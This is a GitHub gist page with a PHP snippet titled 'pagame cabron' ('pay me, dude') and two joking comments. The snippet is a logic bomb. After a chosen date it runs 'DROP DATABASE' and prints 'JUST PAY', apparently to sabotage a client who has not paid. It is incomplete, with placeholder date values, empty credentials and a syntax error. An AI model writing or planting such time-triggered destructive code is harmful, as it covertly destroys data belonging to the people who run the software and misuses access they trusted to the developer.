Skip to content

Instantly share code, notes, and snippets.

@marcomarkkez
Last active November 15, 2022 16:27
Show Gist options
  • Save marcomarkkez/8713792 to your computer and use it in GitHub Desktop.
Save marcomarkkez/8713792 to your computer and use it in GitHub Desktop.
pagame cabron
<?php
//Si ya se pasó la fecha dropea la DB
if( time() > mktime(h,m,s,mes,dia, año)){
$ip = "";
$db = ""
$usr = "";
$pwd = "";
$sql = "DROP DATABASE " . $db;
$query = mysql_query($sql);
die("JUST PAY");
}
?>
@josermz1997
Copy link

Gracias, me sirvió para comparar fechas xD

@marcomarkkez
Copy link
Author

Gracias, me sirvió para comparar fechas xD

LOL, antes usaba mis gists como snippets para mi y no existían privados, prometo poner códigos interesantes

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment